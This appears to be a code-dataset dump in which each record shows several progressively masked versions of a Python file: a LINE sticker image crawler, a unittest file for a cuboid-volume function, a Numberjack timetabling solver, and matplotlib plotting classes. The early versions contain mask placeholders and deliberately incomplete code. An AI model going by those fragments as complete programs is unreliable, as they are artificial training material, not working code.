"step-4": "from urllib import request\nfrom urllib import error\nfrom urllib.request import urlretrieve\nimport os, re\nfrom bs4 import BeautifulSoup\nimport configparser\nfrom apng2gif import apng2gif\nconfig = configparser.ConfigParser()\nconfig.read('crawler.config')\ndirectoryLocation = os.getcwd() + '\\\\img'\nurlList = config['lineStoreUrl']['url'].split(',')\ndownLoadType = '貼圖'\nheaders = ('User_Agent',\n 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0'\n )\nopener = request.build_opener()\nopener.addheaders = [headers]\nrequest.install_opener(opener)\n\n\ndef saveImg(imgurl, downLoadType):\n fileLocation = directoryLocation + '\\\\' + downLoadType + '\\\\' + title\n if not os.path.exists(fileLocation):\n os.makedirs(fileLocation)\n file = fileLocation + '\\\\' + str(count + 1) + '.png'\n urlretrieve(imgurl, filename=file)\n return file\n\n\ndef getTitle(content):\n soup = BeautifulSoup(content, 'html.parser')\n title = soup.find('p', 'mdCMN38Item01Ttl').text\n return title\n\n\ndef downloadImageList(imgurl):\n animationUrl = imgurl[:-7] + '_animation@2x.png'\n try:\n file = saveImg(animationUrl, '動圖')\n apng2gif(file)\n except error.URLError as err:\n saveImg(imgurl, downLoadType)\n\n\nfor i in range(0, len(urlList)):\n downLoadType = '貼圖'\n content = request.urlopen(urlList[i]).read().decode('utf-8', 'ignore')\n rule = '(https.*sticker@2x\\\\.png)'\n ruleEmoji = '(https.*/\\\\d{3}\\\\.png)'\n title = getTitle(content)\n title = re.sub('\\\\s', '', title)\n title = re.sub('[\\\\W_]+', '', title)\n print('開始下載 ' + title)\n imglist = re.compile(rule).findall(content)\n if len(imglist) == 0:\n imglist = re.compile(ruleEmoji).findall(content)\n downLoadType = '小表情'\n for count in range(0, len(imglist)):\n imgurl = downloadImageList(imglist[count])\n print('第', count + 1, '張下載完成!')\nprint('已全部下載完成')\n",
"step-5": "from urllib import request\nfrom urllib import error\nfrom urllib.request import urlretrieve\nimport os, re\nfrom bs4 import BeautifulSoup\nimport configparser\nfrom apng2gif import apng2gif\n\nconfig = configparser.ConfigParser()\nconfig.read('crawler.config')\n# 下載儲存位置\ndirectoryLocation = os.getcwd() + '\\\\img'\n# 設置要爬的頁面\nurlList = config['lineStoreUrl']['url'].split(',')\ndownLoadType = '貼圖'\n\n# 設置User-Agent\nheaders = (\"User_Agent\",\n \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0\")\n# 自定義opener\nopener = request.build_opener()\nopener.addheaders = [headers]\nrequest.install_opener(opener)\n\n\ndef saveImg(imgurl, downLoadType):\n fileLocation = directoryLocation + \"\\\\\" + downLoadType + \"\\\\\" + title\n if not os.path.exists(fileLocation):\n os.makedirs(fileLocation)\n file = fileLocation + \"\\\\\" + str(count + 1) + \".png\"\n urlretrieve(imgurl, filename=file)\n return file\n\n\ndef getTitle(content):\n soup = BeautifulSoup(content, 'html.parser')\n title = soup.find('p', 'mdCMN38Item01Ttl').text\n return title\n\n\ndef downloadImageList(imgurl):\n # if animationUrl download animation png ,else download imageurl\n animationUrl = imgurl[:-7] + '_animation@2x.png'\n try:\n file = saveImg(animationUrl, '動圖')\n apng2gif(file)\n except error.URLError as err:\n saveImg(imgurl, downLoadType)\n\n\nfor i in range(0, len(urlList)):\n downLoadType = '貼圖'\n content = request.urlopen(urlList[i]).read().decode(\"utf-8\", \"ignore\")\n rule = '(https.*sticker@2x\\.png)' # 正則匹配\n ruleEmoji = '(https.*/\\d{3}\\.png)'\n title = getTitle(content)\n title = re.sub('\\s', '', title)\n title = re.sub('[\\W_]+', '', title)\n\n print('開始下載 ' + title)\n imglist = re.compile(rule).findall(content) # 獲取圖片列表\n if len(imglist) == 0:\n imglist = re.compile(ruleEmoji).findall(content) # 小表情規則\n downLoadType = '小表情'\n for count in range(0, len(imglist)):\n imgurl = downloadImageList(imglist[count])\n\n print('第', count + 1, '張下載完成!')\nprint(\"已全部下載完成\")\n",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
"""
Created on Fri Jan 07 20:53:58 2022
@author: Ankit Bharti
"""
from unittest import TestCase, main
from cuboid_volume import *
class TestCuboid(TestCase):
def test_volume(self):
self.assertAlmostEqual(cuboid_volume(2), 8)
self.assertAlmostEqual(cuboid_volume(1), 1)
self.assertAlmostEqual(cuboid_volume(0), 0)
def test_input_value(self):
self.assertRaises(TypeError, cuboid_volume, 'ank')
def test_addition(self):
self.assertEqual(add(3, 4), 7)
self.assertAlmostEqual(add(4.5, 6.2), 10.701, places=2)
def test_addition_input_value(self):
self.assertRaises(TypeError, add, 'ank', 6)
if __name__ == '__main__':
main()
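
The tests import cuboid_volume and add from a cuboid_volume module that is not shown; a minimal sketch that would satisfy the assertions above (hypothetical — the TypeError checks rely on arithmetic on non-numeric input raising naturally):

# cuboid_volume.py (reconstructed sketch)
def cuboid_volume(edge):
    return edge ** 3   # 'ank' ** 3 raises TypeError, as test_input_value expects

def add(a, b):
    return a + b       # add('ank', 6) raises TypeError, as the test expects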
|
normal
|
{
"blob_id": "394f835064d070a30040b6f01b25b6f0e005827d",
"index": 5010,
"step-1": "<mask token>\n\n\nclass TestCuboid(TestCase):\n <mask token>\n\n def test_input_value(self):\n self.assertRaises(TypeError, cuboid_volume, 'ank')\n <mask token>\n\n def test_addition_input_value(self):\n self.assertRaises(TypeError, add, 'ank', 6)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass TestCuboid(TestCase):\n\n def test_volume(self):\n self.assertAlmostEqual(cuboid_volume(2), 8)\n self.assertAlmostEqual(cuboid_volume(1), 1)\n self.assertAlmostEqual(cuboid_volume(0), 0)\n\n def test_input_value(self):\n self.assertRaises(TypeError, cuboid_volume, 'ank')\n\n def test_addition(self):\n self.assertEqual(add(3, 4), 7)\n self.assertAlmostEqual(add(4.5, 6.2), 10.701, places=2)\n\n def test_addition_input_value(self):\n self.assertRaises(TypeError, add, 'ank', 6)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass TestCuboid(TestCase):\n\n def test_volume(self):\n self.assertAlmostEqual(cuboid_volume(2), 8)\n self.assertAlmostEqual(cuboid_volume(1), 1)\n self.assertAlmostEqual(cuboid_volume(0), 0)\n\n def test_input_value(self):\n self.assertRaises(TypeError, cuboid_volume, 'ank')\n\n def test_addition(self):\n self.assertEqual(add(3, 4), 7)\n self.assertAlmostEqual(add(4.5, 6.2), 10.701, places=2)\n\n def test_addition_input_value(self):\n self.assertRaises(TypeError, add, 'ank', 6)\n\n\nif __name__ == '__main__':\n main()\n",
"step-4": "<mask token>\nfrom unittest import TestCase, main\nfrom cuboid_volume import *\n\n\nclass TestCuboid(TestCase):\n\n def test_volume(self):\n self.assertAlmostEqual(cuboid_volume(2), 8)\n self.assertAlmostEqual(cuboid_volume(1), 1)\n self.assertAlmostEqual(cuboid_volume(0), 0)\n\n def test_input_value(self):\n self.assertRaises(TypeError, cuboid_volume, 'ank')\n\n def test_addition(self):\n self.assertEqual(add(3, 4), 7)\n self.assertAlmostEqual(add(4.5, 6.2), 10.701, places=2)\n\n def test_addition_input_value(self):\n self.assertRaises(TypeError, add, 'ank', 6)\n\n\nif __name__ == '__main__':\n main()\n",
"step-5": "\"\"\"\nCreated on Fri Jan 07 20:53:58 2022\n@author: Ankit Bharti\n\n\"\"\"\n\n\nfrom unittest import TestCase, main\nfrom cuboid_volume import *\n\n\nclass TestCuboid(TestCase):\n def test_volume(self):\n self.assertAlmostEqual(cuboid_volume(2), 8)\n self.assertAlmostEqual(cuboid_volume(1), 1)\n self.assertAlmostEqual(cuboid_volume(0), 0)\n\n def test_input_value(self):\n self.assertRaises(TypeError, cuboid_volume, 'ank')\n\n def test_addition(self):\n self.assertEqual(add(3, 4), 7)\n self.assertAlmostEqual(add(4.5, 6.2), 10.701, places=2)\n\n def test_addition_input_value(self):\n self.assertRaises(TypeError, add, 'ank', 6)\n\n\nif __name__ == '__main__':\n main()\n",
"step-ids": [
3,
5,
6,
7,
8
]
}
|
[
3,
5,
6,
7,
8
] |
<|reserved_special_token_0|>
class Subjects(object):
def __init__(self):
self.store = list()
def add(self, subjects):
if isinstance(subjects, (list, tuple)):
self.store.extend(subjects)
elif isinstance(subjects, str):
self.store.append(subjects)
else:
raise TypeError(
'only lists, tuples and strings of subjects can be added')
class TimeSlots(object):
"""
Currently only takes # of timeslots until I can figure out a good
    way to standardize time inputs
"""
def __init__(self, num_slots):
if isinstance(num_slots, int):
self.store = num_slots
else:
raise TypeError('only accepts number of timeslots as ints')
class Solver(object):
def __init__(self, teachers, subjects, timeslots):
if timeslots.store < len(teachers.store):
raise ValueError('unable to solve for more teachers than timeslots'
)
self.teachers = teachers.store
self.subjects = subjects.store
self.timeslots = timeslots.store
self.matrix = None
self.model = None
self.solver = None
self.solution = None
def solve(self):
self.matrix = Nj.Matrix(len(self.subjects), self.timeslots, len(
self.teachers) + 1)
self.model = Nj.Model([Nj.AllDiffExcept0(row) for row in self.
matrix.row], [Nj.AllDiffExcept0(col) for col in self.matrix.col])
self.solver = self.model.load('Mistral')
self.solver.solve()
self.solution = self.matrix
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Teachers(object):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
class Subjects(object):
def __init__(self):
self.store = list()
def add(self, subjects):
if isinstance(subjects, (list, tuple)):
self.store.extend(subjects)
elif isinstance(subjects, str):
self.store.append(subjects)
else:
raise TypeError(
'only lists, tuples and strings of subjects can be added')
class TimeSlots(object):
"""
Currently only takes # of timeslots until I can figure out a good
    way to standardize time inputs
"""
def __init__(self, num_slots):
if isinstance(num_slots, int):
self.store = num_slots
else:
raise TypeError('only accepts number of timeslots as ints')
class Solver(object):
def __init__(self, teachers, subjects, timeslots):
if timeslots.store < len(teachers.store):
raise ValueError('unable to solve for more teachers than timeslots'
)
self.teachers = teachers.store
self.subjects = subjects.store
self.timeslots = timeslots.store
self.matrix = None
self.model = None
self.solver = None
self.solution = None
def solve(self):
self.matrix = Nj.Matrix(len(self.subjects), self.timeslots, len(
self.teachers) + 1)
self.model = Nj.Model([Nj.AllDiffExcept0(row) for row in self.
matrix.row], [Nj.AllDiffExcept0(col) for col in self.matrix.col])
self.solver = self.model.load('Mistral')
self.solver.solve()
self.solution = self.matrix
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Teachers(object):
<|reserved_special_token_0|>
def __init__(self):
self.store = list()
def add(self, teachers):
if isinstance(teachers, (list, tuple)):
self.store.extend(teachers)
elif isinstance(teachers, str):
self.store.append(teachers)
else:
raise TypeError(
'only lists, tuples and strings of teachers can be added')
class Subjects(object):
def __init__(self):
self.store = list()
def add(self, subjects):
if isinstance(subjects, (list, tuple)):
self.store.extend(subjects)
elif isinstance(subjects, str):
self.store.append(subjects)
else:
raise TypeError(
'only lists, tuples and strings of subjects can be added')
class TimeSlots(object):
"""
Currently only takes # of timeslots until I can figure out a good
    way to standardize time inputs
"""
def __init__(self, num_slots):
if isinstance(num_slots, int):
self.store = num_slots
else:
raise TypeError('only accepts number of timeslots as ints')
class Solver(object):
def __init__(self, teachers, subjects, timeslots):
if timeslots.store < len(teachers.store):
raise ValueError('unable to solve for more teachers than timeslots'
)
self.teachers = teachers.store
self.subjects = subjects.store
self.timeslots = timeslots.store
self.matrix = None
self.model = None
self.solver = None
self.solution = None
def solve(self):
self.matrix = Nj.Matrix(len(self.subjects), self.timeslots, len(
self.teachers) + 1)
self.model = Nj.Model([Nj.AllDiffExcept0(row) for row in self.
matrix.row], [Nj.AllDiffExcept0(col) for col in self.matrix.col])
self.solver = self.model.load('Mistral')
self.solver.solve()
self.solution = self.matrix
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Teachers(object):
"""Will be expanded to allow constraints for individual teachers"""
def __init__(self):
self.store = list()
def add(self, teachers):
if isinstance(teachers, (list, tuple)):
self.store.extend(teachers)
elif isinstance(teachers, str):
self.store.append(teachers)
else:
raise TypeError(
'only lists, tuples and strings of teachers can be added')
class Subjects(object):
def __init__(self):
self.store = list()
def add(self, subjects):
if isinstance(subjects, (list, tuple)):
self.store.extend(subjects)
elif isinstance(subjects, str):
self.store.append(subjects)
else:
raise TypeError(
'only lists, tuples and strings of subjects can be added')
class TimeSlots(object):
"""
Currently only takes # of timeslots until I can figure out a good
    way to standardize time inputs
"""
def __init__(self, num_slots):
if isinstance(num_slots, int):
self.store = num_slots
else:
raise TypeError('only accepts number of timeslots as ints')
class Solver(object):
def __init__(self, teachers, subjects, timeslots):
if timeslots.store < len(teachers.store):
raise ValueError('unable to solve for more teachers than timeslots'
)
self.teachers = teachers.store
self.subjects = subjects.store
self.timeslots = timeslots.store
self.matrix = None
self.model = None
self.solver = None
self.solution = None
def solve(self):
self.matrix = Nj.Matrix(len(self.subjects), self.timeslots, len(
self.teachers) + 1)
self.model = Nj.Model([Nj.AllDiffExcept0(row) for row in self.
matrix.row], [Nj.AllDiffExcept0(col) for col in self.matrix.col])
self.solver = self.model.load('Mistral')
self.solver.solve()
self.solution = self.matrix
<|reserved_special_token_1|>
import Numberjack as Nj
class Teachers(object):
"""Will be expanded to allow constraints for individual teachers"""
def __init__(self):
self.store = list()
def add(self, teachers):
if isinstance(teachers, (list, tuple)):
self.store.extend(teachers)
elif isinstance(teachers, str):
self.store.append(teachers)
else:
raise TypeError('only lists, tuples and strings '
'of teachers can be added')
class Subjects(object):
def __init__(self):
self.store = list()
def add(self, subjects):
if isinstance(subjects, (list, tuple)):
self.store.extend(subjects)
elif isinstance(subjects, str):
self.store.append(subjects)
else:
raise TypeError('only lists, tuples and strings '
'of subjects can be added')
class TimeSlots(object):
"""
Currently only takes # of timeslots until I can figure out a good
    way to standardize time inputs
"""
def __init__(self, num_slots):
if isinstance(num_slots, int):
self.store = num_slots
else:
raise TypeError('only accepts number of timeslots as ints')
class Solver(object):
def __init__(self, teachers, subjects, timeslots):
if timeslots.store < len(teachers.store):
raise ValueError('unable to solve for more teachers '
'than timeslots')
self.teachers = teachers.store
self.subjects = subjects.store
self.timeslots = timeslots.store
self.matrix = None
self.model = None
self.solver = None
self.solution = None
def solve(self):
self.matrix = Nj.Matrix(len(self.subjects),
self.timeslots,
len(self.teachers)+1)
self.model = Nj.Model(
[Nj.AllDiffExcept0(row) for row in self.matrix.row],
[Nj.AllDiffExcept0(col) for col in self.matrix.col]
)
self.solver = self.model.load('Mistral')
self.solver.solve()
self.solution = self.matrix
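
A hedged end-to-end sketch of driving the solver above; the teacher and subject names are placeholders:

teachers = Teachers()
teachers.add(['Ada', 'Grace'])

subjects = Subjects()
subjects.add(['Math', 'Physics', 'CS'])

schedule = Solver(teachers, subjects, TimeSlots(4))
schedule.solve()
print(schedule.solution)  # nonzero cells index a teacher; 0 leaves the slot unassigned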
|
flexible
|
{
"blob_id": "8787126e654808a5fec52283780d9b4f668fa50f",
"index": 8593,
"step-1": "<mask token>\n\n\nclass Subjects(object):\n\n def __init__(self):\n self.store = list()\n\n def add(self, subjects):\n if isinstance(subjects, (list, tuple)):\n self.store.extend(subjects)\n elif isinstance(subjects, str):\n self.store.append(subjects)\n else:\n raise TypeError(\n 'only lists, tuples and strings of subjects can be added')\n\n\nclass TimeSlots(object):\n \"\"\"\n Currently only takes # of timeslots until I can figure out a good\n way to standardized time inputs\n \"\"\"\n\n def __init__(self, num_slots):\n if isinstance(num_slots, int):\n self.store = num_slots\n else:\n raise TypeError('only accepts number of timeslots as ints')\n\n\nclass Solver(object):\n\n def __init__(self, teachers, subjects, timeslots):\n if timeslots.store < len(teachers.store):\n raise ValueError('unable to solve for more teachers than timeslots'\n )\n self.teachers = teachers.store\n self.subjects = subjects.store\n self.timeslots = timeslots.store\n self.matrix = None\n self.model = None\n self.solver = None\n self.solution = None\n\n def solve(self):\n self.matrix = Nj.Matrix(len(self.subjects), self.timeslots, len(\n self.teachers) + 1)\n self.model = Nj.Model([Nj.AllDiffExcept0(row) for row in self.\n matrix.row], [Nj.AllDiffExcept0(col) for col in self.matrix.col])\n self.solver = self.model.load('Mistral')\n self.solver.solve()\n self.solution = self.matrix\n",
"step-2": "<mask token>\n\n\nclass Teachers(object):\n <mask token>\n <mask token>\n <mask token>\n\n\nclass Subjects(object):\n\n def __init__(self):\n self.store = list()\n\n def add(self, subjects):\n if isinstance(subjects, (list, tuple)):\n self.store.extend(subjects)\n elif isinstance(subjects, str):\n self.store.append(subjects)\n else:\n raise TypeError(\n 'only lists, tuples and strings of subjects can be added')\n\n\nclass TimeSlots(object):\n \"\"\"\n Currently only takes # of timeslots until I can figure out a good\n way to standardized time inputs\n \"\"\"\n\n def __init__(self, num_slots):\n if isinstance(num_slots, int):\n self.store = num_slots\n else:\n raise TypeError('only accepts number of timeslots as ints')\n\n\nclass Solver(object):\n\n def __init__(self, teachers, subjects, timeslots):\n if timeslots.store < len(teachers.store):\n raise ValueError('unable to solve for more teachers than timeslots'\n )\n self.teachers = teachers.store\n self.subjects = subjects.store\n self.timeslots = timeslots.store\n self.matrix = None\n self.model = None\n self.solver = None\n self.solution = None\n\n def solve(self):\n self.matrix = Nj.Matrix(len(self.subjects), self.timeslots, len(\n self.teachers) + 1)\n self.model = Nj.Model([Nj.AllDiffExcept0(row) for row in self.\n matrix.row], [Nj.AllDiffExcept0(col) for col in self.matrix.col])\n self.solver = self.model.load('Mistral')\n self.solver.solve()\n self.solution = self.matrix\n",
"step-3": "<mask token>\n\n\nclass Teachers(object):\n <mask token>\n\n def __init__(self):\n self.store = list()\n\n def add(self, teachers):\n if isinstance(teachers, (list, tuple)):\n self.store.extend(teachers)\n elif isinstance(teachers, str):\n self.store.append(teachers)\n else:\n raise TypeError(\n 'only lists, tuples and strings of teachers can be added')\n\n\nclass Subjects(object):\n\n def __init__(self):\n self.store = list()\n\n def add(self, subjects):\n if isinstance(subjects, (list, tuple)):\n self.store.extend(subjects)\n elif isinstance(subjects, str):\n self.store.append(subjects)\n else:\n raise TypeError(\n 'only lists, tuples and strings of subjects can be added')\n\n\nclass TimeSlots(object):\n \"\"\"\n Currently only takes # of timeslots until I can figure out a good\n way to standardized time inputs\n \"\"\"\n\n def __init__(self, num_slots):\n if isinstance(num_slots, int):\n self.store = num_slots\n else:\n raise TypeError('only accepts number of timeslots as ints')\n\n\nclass Solver(object):\n\n def __init__(self, teachers, subjects, timeslots):\n if timeslots.store < len(teachers.store):\n raise ValueError('unable to solve for more teachers than timeslots'\n )\n self.teachers = teachers.store\n self.subjects = subjects.store\n self.timeslots = timeslots.store\n self.matrix = None\n self.model = None\n self.solver = None\n self.solution = None\n\n def solve(self):\n self.matrix = Nj.Matrix(len(self.subjects), self.timeslots, len(\n self.teachers) + 1)\n self.model = Nj.Model([Nj.AllDiffExcept0(row) for row in self.\n matrix.row], [Nj.AllDiffExcept0(col) for col in self.matrix.col])\n self.solver = self.model.load('Mistral')\n self.solver.solve()\n self.solution = self.matrix\n",
"step-4": "<mask token>\n\n\nclass Teachers(object):\n \"\"\"Will be expanded to allow constraints for individual teachers\"\"\"\n\n def __init__(self):\n self.store = list()\n\n def add(self, teachers):\n if isinstance(teachers, (list, tuple)):\n self.store.extend(teachers)\n elif isinstance(teachers, str):\n self.store.append(teachers)\n else:\n raise TypeError(\n 'only lists, tuples and strings of teachers can be added')\n\n\nclass Subjects(object):\n\n def __init__(self):\n self.store = list()\n\n def add(self, subjects):\n if isinstance(subjects, (list, tuple)):\n self.store.extend(subjects)\n elif isinstance(subjects, str):\n self.store.append(subjects)\n else:\n raise TypeError(\n 'only lists, tuples and strings of subjects can be added')\n\n\nclass TimeSlots(object):\n \"\"\"\n Currently only takes # of timeslots until I can figure out a good\n way to standardized time inputs\n \"\"\"\n\n def __init__(self, num_slots):\n if isinstance(num_slots, int):\n self.store = num_slots\n else:\n raise TypeError('only accepts number of timeslots as ints')\n\n\nclass Solver(object):\n\n def __init__(self, teachers, subjects, timeslots):\n if timeslots.store < len(teachers.store):\n raise ValueError('unable to solve for more teachers than timeslots'\n )\n self.teachers = teachers.store\n self.subjects = subjects.store\n self.timeslots = timeslots.store\n self.matrix = None\n self.model = None\n self.solver = None\n self.solution = None\n\n def solve(self):\n self.matrix = Nj.Matrix(len(self.subjects), self.timeslots, len(\n self.teachers) + 1)\n self.model = Nj.Model([Nj.AllDiffExcept0(row) for row in self.\n matrix.row], [Nj.AllDiffExcept0(col) for col in self.matrix.col])\n self.solver = self.model.load('Mistral')\n self.solver.solve()\n self.solution = self.matrix\n",
"step-5": "import Numberjack as Nj\n\n\nclass Teachers(object):\n \"\"\"Will be expanded to allow constraints for individual teachers\"\"\"\n def __init__(self):\n self.store = list()\n\n def add(self, teachers):\n if isinstance(teachers, (list, tuple)):\n self.store.extend(teachers)\n elif isinstance(teachers, str):\n self.store.append(teachers)\n else:\n raise TypeError('only lists, tuples and strings '\n 'of teachers can be added')\n\n\nclass Subjects(object):\n def __init__(self):\n self.store = list()\n\n def add(self, subjects):\n if isinstance(subjects, (list, tuple)):\n self.store.extend(subjects)\n elif isinstance(subjects, str):\n self.store.append(subjects)\n else:\n raise TypeError('only lists, tuples and strings '\n 'of subjects can be added')\n\n\nclass TimeSlots(object):\n \"\"\"\n Currently only takes # of timeslots until I can figure out a good\n way to standardized time inputs\n \"\"\"\n def __init__(self, num_slots):\n if isinstance(num_slots, int):\n self.store = num_slots\n else:\n raise TypeError('only accepts number of timeslots as ints')\n\n\nclass Solver(object):\n def __init__(self, teachers, subjects, timeslots):\n if timeslots.store < len(teachers.store):\n raise ValueError('unable to solve for more teachers '\n 'than timeslots')\n\n self.teachers = teachers.store\n self.subjects = subjects.store\n self.timeslots = timeslots.store\n self.matrix = None\n self.model = None\n self.solver = None\n self.solution = None\n\n def solve(self):\n self.matrix = Nj.Matrix(len(self.subjects),\n self.timeslots,\n len(self.teachers)+1)\n\n self.model = Nj.Model(\n [Nj.AllDiffExcept0(row) for row in self.matrix.row],\n [Nj.AllDiffExcept0(col) for col in self.matrix.col]\n )\n\n self.solver = self.model.load('Mistral')\n self.solver.solve()\n\n self.solution = self.matrix\n",
"step-ids": [
9,
10,
12,
13,
15
]
}
|
[
9,
10,
12,
13,
15
] |
<|reserved_special_token_0|>
class Scatter:
<|reserved_special_token_0|>
<|reserved_special_token_0|>
class Pie:
def __init__(self, values, labels, title):
self.style = 'fivethirtyeight'
self.values = values
self.labels = labels
self.explode = [(0) for i in range(len(values))]
self.title = title
def plot(self):
plt.style.use(self.style)
plt.pie(self.values, labels=self.labels, explode=self.explode,
shadow=True, startangle=90, autopct='%1.1f%%', wedgeprops={
'edgecolor': 'black'})
plt.title(self.title)
plt.tight_layout()
plt.show()
class Column:
pass
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Scatter:
def __init__(self, values, ylabel, title):
self.values = values
self.range = list(range(len(values)))
self.ylabel = ylabel
self.title = title
<|reserved_special_token_0|>
class Pie:
def __init__(self, values, labels, title):
self.style = 'fivethirtyeight'
self.values = values
self.labels = labels
self.explode = [(0) for i in range(len(values))]
self.title = title
def plot(self):
plt.style.use(self.style)
plt.pie(self.values, labels=self.labels, explode=self.explode,
shadow=True, startangle=90, autopct='%1.1f%%', wedgeprops={
'edgecolor': 'black'})
plt.title(self.title)
plt.tight_layout()
plt.show()
class Column:
pass
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Scatter:
def __init__(self, values, ylabel, title):
self.values = values
self.range = list(range(len(values)))
self.ylabel = ylabel
self.title = title
def plot(self):
fig = plt.figure()
ax = fig.add_axes([0, 0, 1, 1])
ax.scatter(self.range, self.values, color='r', s=1)
ax.set_xlabel('Days')
ax.set_ylabel(self.ylabel)
ax.set_title(self.title)
plt.ylim(0, self.values[-1])
plt.show()
class Pie:
def __init__(self, values, labels, title):
self.style = 'fivethirtyeight'
self.values = values
self.labels = labels
self.explode = [(0) for i in range(len(values))]
self.title = title
def plot(self):
plt.style.use(self.style)
plt.pie(self.values, labels=self.labels, explode=self.explode,
shadow=True, startangle=90, autopct='%1.1f%%', wedgeprops={
'edgecolor': 'black'})
plt.title(self.title)
plt.tight_layout()
plt.show()
class Column:
pass
<|reserved_special_token_1|>
import matplotlib.pyplot as plt
class Scatter:
def __init__(self, values, ylabel, title):
self.values = values
self.range = list(range(len(values)))
self.ylabel = ylabel
self.title = title
def plot(self):
fig = plt.figure()
ax = fig.add_axes([0, 0, 1, 1])
ax.scatter(self.range, self.values, color='r', s=1)
ax.set_xlabel('Days')
ax.set_ylabel(self.ylabel)
ax.set_title(self.title)
plt.ylim(0, self.values[-1])
plt.show()
class Pie:
def __init__(self, values, labels, title):
self.style = 'fivethirtyeight'
self.values = values
self.labels = labels
self.explode = [(0) for i in range(len(values))]
self.title = title
def plot(self):
plt.style.use(self.style)
plt.pie(self.values, labels=self.labels, explode=self.explode,
shadow=True, startangle=90, autopct='%1.1f%%', wedgeprops={
'edgecolor': 'black'})
plt.title(self.title)
plt.tight_layout()
plt.show()
class Column:
pass
<|reserved_special_token_1|>
import matplotlib.pyplot as plt
class Scatter:
def __init__(self, values, ylabel, title):
self.values = values
self.range = list(range(len(values)))
self.ylabel = ylabel
self.title = title
def plot(self):
fig = plt.figure()
ax = fig.add_axes([0, 0, 1, 1])
ax.scatter(self.range, self.values, color='r', s=1)
ax.set_xlabel('Days')
ax.set_ylabel(self.ylabel)
ax.set_title(self.title)
plt.ylim(0, self.values[-1])
plt.show()
class Pie:
def __init__(self, values, labels, title):
self.style = "fivethirtyeight"
self.values = values
self.labels = labels
self.explode = [0 for i in range(len(values))]
self.title = title
def plot(self):
plt.style.use(self.style)
plt.pie(self.values, labels=self.labels, explode=self.explode, shadow=True,
startangle=90, autopct='%1.1f%%',
wedgeprops={'edgecolor': 'black'})
plt.title(self.title)
plt.tight_layout()
plt.show()
class Column:
pass
|
flexible
|
{
"blob_id": "58385a7713a8f88925ced714d25f1522bc7e39d8",
"index": 1181,
"step-1": "<mask token>\n\n\nclass Scatter:\n <mask token>\n <mask token>\n\n\nclass Pie:\n\n def __init__(self, values, labels, title):\n self.style = 'fivethirtyeight'\n self.values = values\n self.labels = labels\n self.explode = [(0) for i in range(len(values))]\n self.title = title\n\n def plot(self):\n plt.style.use(self.style)\n plt.pie(self.values, labels=self.labels, explode=self.explode,\n shadow=True, startangle=90, autopct='%1.1f%%', wedgeprops={\n 'edgecolor': 'black'})\n plt.title(self.title)\n plt.tight_layout()\n plt.show()\n\n\nclass Column:\n pass\n",
"step-2": "<mask token>\n\n\nclass Scatter:\n\n def __init__(self, values, ylabel, title):\n self.values = values\n self.range = list(range(len(values)))\n self.ylabel = ylabel\n self.title = title\n <mask token>\n\n\nclass Pie:\n\n def __init__(self, values, labels, title):\n self.style = 'fivethirtyeight'\n self.values = values\n self.labels = labels\n self.explode = [(0) for i in range(len(values))]\n self.title = title\n\n def plot(self):\n plt.style.use(self.style)\n plt.pie(self.values, labels=self.labels, explode=self.explode,\n shadow=True, startangle=90, autopct='%1.1f%%', wedgeprops={\n 'edgecolor': 'black'})\n plt.title(self.title)\n plt.tight_layout()\n plt.show()\n\n\nclass Column:\n pass\n",
"step-3": "<mask token>\n\n\nclass Scatter:\n\n def __init__(self, values, ylabel, title):\n self.values = values\n self.range = list(range(len(values)))\n self.ylabel = ylabel\n self.title = title\n\n def plot(self):\n fig = plt.figure()\n ax = fig.add_axes([0, 0, 1, 1])\n ax.scatter(self.range, self.values, color='r', s=1)\n ax.set_xlabel('Days')\n ax.set_ylabel(self.ylabel)\n ax.set_title(self.title)\n plt.ylim(0, self.values[-1])\n plt.show()\n\n\nclass Pie:\n\n def __init__(self, values, labels, title):\n self.style = 'fivethirtyeight'\n self.values = values\n self.labels = labels\n self.explode = [(0) for i in range(len(values))]\n self.title = title\n\n def plot(self):\n plt.style.use(self.style)\n plt.pie(self.values, labels=self.labels, explode=self.explode,\n shadow=True, startangle=90, autopct='%1.1f%%', wedgeprops={\n 'edgecolor': 'black'})\n plt.title(self.title)\n plt.tight_layout()\n plt.show()\n\n\nclass Column:\n pass\n",
"step-4": "import matplotlib.pyplot as plt\n\n\nclass Scatter:\n\n def __init__(self, values, ylabel, title):\n self.values = values\n self.range = list(range(len(values)))\n self.ylabel = ylabel\n self.title = title\n\n def plot(self):\n fig = plt.figure()\n ax = fig.add_axes([0, 0, 1, 1])\n ax.scatter(self.range, self.values, color='r', s=1)\n ax.set_xlabel('Days')\n ax.set_ylabel(self.ylabel)\n ax.set_title(self.title)\n plt.ylim(0, self.values[-1])\n plt.show()\n\n\nclass Pie:\n\n def __init__(self, values, labels, title):\n self.style = 'fivethirtyeight'\n self.values = values\n self.labels = labels\n self.explode = [(0) for i in range(len(values))]\n self.title = title\n\n def plot(self):\n plt.style.use(self.style)\n plt.pie(self.values, labels=self.labels, explode=self.explode,\n shadow=True, startangle=90, autopct='%1.1f%%', wedgeprops={\n 'edgecolor': 'black'})\n plt.title(self.title)\n plt.tight_layout()\n plt.show()\n\n\nclass Column:\n pass\n",
